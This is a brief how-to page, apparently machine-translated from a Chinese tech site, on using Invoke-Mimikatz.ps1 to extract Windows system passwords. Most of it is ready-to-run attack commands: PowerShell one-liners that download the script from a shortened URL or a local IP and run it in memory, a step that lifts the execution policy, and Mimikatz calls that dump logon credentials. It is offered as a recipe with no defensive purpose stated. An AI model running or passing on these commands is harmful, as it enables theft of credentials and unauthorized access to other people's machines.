Get the App
SLTechnology News&Howtos  ›  Network Security  › 

Invoke-Mimikatz.ps1 acquires the system password

Shulou Source: shulou.com Published: 2022-06-01 02:02:35 10月04日 Update

(1) Invoke-Mimikatz.ps1 download address

Https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

(2) have the network environment to execute orders directly.

Powershell "IEX (New-Object Net.WebClient) .DownloadString ('http://is.gd/oeoFuI'); Invoke-Mimikatz-DumpCreds"

(3) Local network environment

Powershell "IEX (New-Object Net.WebClient) .DownloadString ('http://192.168.1.1/');Invoke-Mimikatz-DumpCreds"

(4) download local execution

In a word:

Powershell Import-Module.\ Invoke-Mimikatz.ps1;Invoke-Mimikatz-Command'"privilege::debug"sekurlsa::logonPasswords full"'

Subject to authorization restrictions:

Get-ExecutionPolicy / / result shows restricted

Set-ExecutionPolicy Unrestricted / / Open restrictions

Import-Module.\ Invoke-Mimikatz.ps1 / / Import command

Invoke-Mimikatz-Command'"privilege::debug"sekurlsa::logonPasswords full" / / get the password

Tags: Commands environment network restrictions passwords one sentence address result system Apple Docker Huawei Linux macOS MariaDB Microsoft MySQL NVidia OPPO Reno Shulou Information Microsoft Docker Linux Apple